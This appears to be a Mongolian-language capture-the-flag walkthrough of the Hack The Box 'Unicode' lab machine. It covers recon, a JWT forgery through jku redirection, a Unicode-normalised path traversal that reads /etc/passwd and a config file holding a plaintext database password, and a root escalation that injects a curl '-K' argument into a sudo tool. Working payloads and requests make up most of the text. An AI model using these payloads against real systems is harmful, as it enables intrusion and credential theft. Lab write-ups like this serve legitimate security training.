1. IP Address

# Machine Address
10.10.11.126

# Local Address
10.10.14.62

2. Nmap

nmap -sV -sC -oA nmap/unicode 10.10.11.126

Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 02:10 EST
Nmap scan report for 10.10.11.126
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fd:a0:f7:93:9e:d3:cc:bd:c2:3c:7f:92:35:70:d7:77 (RSA)
|   256 8b:b6:98:2d:fa:00:e5:e2:9c:8f:af:0f:44:99:03:b1 (ECDSA)
|_  256 c9:89:27:3e:91:cb:51:27:6f:39:89:36:10:41:df:7c (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-generator: Hugo 0.83.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Hackmedia
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.41 seconds

1.2 hosts

нэмэх ect/hosts рүү:

10.10.11.126 hackmedia.htb

3. ffuf

ffuf -u http://FUZZ.hackmedia.htb -w /opt/SecLists/Discovery/DNS/dns-Jhaddix.txt -o ffuf/Jhaddix.out

ffuf -u http://hackmedia.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -c -fs 9294 -t 100

4. JWT

Regsiter хийгээд burp шалгах:

POST /login/ HTTP/1.1
Host: hackmedia.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://hackmedia.htb
DNT: 1
Connection: close
Referer: http://hackmedia.htb/login/
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=ca4mi&password=ca4mi

sign in хийгээд орвол:

GET /dashboard/ HTTP/1.1
Host: hackmedia.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://hackmedia.htb/login/
DNT: 1
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy9qd2tzLmpzb24ifQ.eyJ1c2VyIjoiY2E0bWkifQ.nT3ZR5zm6FIbC-0jPxWfJScEYQ_S3WnScSZxZG6G9m4XmUIBeiNdU5ZFt-hrmSUGlVboD2L8ugv_Scs-d-OllwI931tITfKLFOf50T9_3JdKlxkd1ll5QXh_S4SfIf0KPZbRD1ORBxn-DSySPOr0Mg1hdnd4kAQjOOSczNg9J03BqxTeHzfXsWZdM861iQfF4NLQ8FupMNyeMM4wBFGxPKTb_RSmse_Nw7HgkRz83cOsiQBNCnW-1bdX_KL_oV33FuAjnnYTrTTAfVcVb2PZ2REZW36AWpPJTD8WDhwEp_FIQYZMcOB4ivBQf_5PJIqBjG2Q7gCGG1uB1w305Zp0YA
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

flask-unsign command:

pip3 install flask-unsign

decode хийнэ: https://book.hacktricks.xyz/pentesting/pentesting-web/flask

lask-unsign -c eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy9qd2tzLmpzb24ifQ.eyJ1c2VyIjoiY2E0bWkifQ.nT3ZR5zm6FIbC-0jPxWfJScEYQ_S3WnScSZxZG6G9m4XmUIBeiNdU5ZFt-hrmSUGlVboD2L8ugv_Scs-d-OllwI931tITfKLFOf50T9_3JdKlxkd1ll5QXh_S4SfIf0KPZbRD1ORBxn-DSySPOr0Mg1hdnd4kAQjOOSczNg9J03BqxTeHzfXsWZdM861iQfF4NLQ8FupMNyeMM4wBFGxPKTb_RSmse_Nw7HgkRz83cOsiQBNCnW-1bdX_KL_oV33FuAjnnYTrTTAfVcVb2PZ2REZW36AWpPJTD8WDhwEp_FIQYZMcOB4ivBQf_5PJIqBjG2Q7gCGG1uB1w305Zp0YA -d

үр дүнд:

{'typ': 'JWT', 'alg': 'RS256', 'jku': 'http://hackmedia.htb/static/jwks.json'}

static/jwks.json jwks:

{
    "keys": [
        {
            "kty": "RSA",
            "use": "sig",
            "kid": "hackthebox",
            "alg": "RS256",
            "n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs",
            "e": "AQAB"
        }
    ]
}

JSON Web Key Set (JWKS) A JSON object that represents a set of JWKs. The JSON object MUST have a keys member, which is an array of JWKs.

[6.3.1.1](https://datatracker.ietf.org/doc/html/rfc7518#section-6.3.1.1).  "n" (Modulus) Parameter

   The "n" (modulus) parameter contains the modulus value for the RSA
   public key.  It is represented as a Base64urlUInt-encoded value.

   Note that implementers have found that some cryptographic libraries
   prefix an extra zero-valued octet to the modulus representations they
   return, for instance, returning 257 octets for a 2048-bit key, rather
   than 256.  Implementations using such libraries will need to take
   care to omit the extra octet from the base64url-encoded
   representation.

[6.3.1.2](https://datatracker.ietf.org/doc/html/rfc7518#section-6.3.1.2).  "e" (Exponent) Parameter

   The "e" (exponent) parameter contains the exponent value for the RSA
   public key.  It is represented as a Base64urlUInt-encoded value.

   For instance, when representing the value 65537, the octet sequence
   to be base64url-encoded MUST consist of the three octets [1, 0, 1];
   the resulting representation for this value is "AQAB".

https://mkjwk.org - random key set generate хийнэ. Public Key хэсгийн “n”, Public key, Private key pem-үүдыг хуулан ашиглана.

http://jwt.io дотор шинэ хэрэглэгч~н cookie -г RS256 -р сонгоод:

role: admin, jku: http://hackmedia.htb/static/../redirect/?url=<local_ip:8000/jwks.json>

https://mkjwk.org -с авсан Public болoн Private key pem-д доор байгаа харгалзах талбарт нь хуулна.

Local сервер асаагаад

python -m http.server

http:hackmedia.htb руу sign-in хийж ороод http://jwt.io -с tтохируулсан cookie-ээр солино.

10.10.11.126 - - [29/Dec/2021 01:31:21] "GET /jwks.json HTTP/1.1" 200 -

5. LFI filter

/display/?page=XXXX

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
code:x:1000:1000:,,,:/home/code:/bin/bash

user-г хэн болохыг шалгаж байна:

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/proc/self/environ

LANG=en_US.UTF-8
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LOGNAME=codeUSER=codeSHELL=/bin/bash
INVOCATION_ID=b2a1c9ff17bd49e2bf01d83a1cf7ce1b

USER: code user.txt ингэж авч болж байна

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/user.txt

user.txt

743e4e*********

SSH key авах гээд үзэхээр болохгүй байна. Machine reset хийж үзээд дахиад хандаад үзэх санаатай байна:

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/.ssh/id_rsa

болсонгүй.

/etc/nginx/sites-enabled/default

limit_req_zone $binary_remote_addr zone=mylimit:10m rate=800r/s;

server{
#Change the Webroot from /home/code/app/ to /var/www/html/
#change the user password from db.yaml
	listen 80;
	error_page 503 /rate-limited/;
	location / {
                limit_req zone=mylimit;
		proxy_pass http://localhost:8000;
		include /etc/nginx/proxy_params;
		proxy_redirect off;
	}
	location /static/{
		alias /home/code/coder/static/styles/;
	}
}

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/coder/db.yaml 

mysql_host: "localhost"
mysql_user: "code"
mysql_password: "B3stC0d3r2021@@!"
mysql_db: "user"

ssh-r хандах:

ssh code@10.10.11.126

sudo -l:

User code may run the following commands on code:
    (root) NOPASSWD: /usr/bin/treport

6. Privilege Escalation

tool: https://github.com/diego-treitos/linux-smart-enumeration

python3 -m http.server

wget 10.10.14.5:800/lse.sh
chmod +x lse.sh
./lse.sh

sudo /usr/bin/treport

1.Create Threat Report.
2.Read Threat Report.
3.Download A Threat Report.
4.Quit.

Enter your choice:3

Enter the IP/file_name:{-K,/root/root.txt}

Warning: /root/root.txt:1: warning: '517*****************' is 
Warning: unknown
curl: no URL specified!

root.txt:

517*****************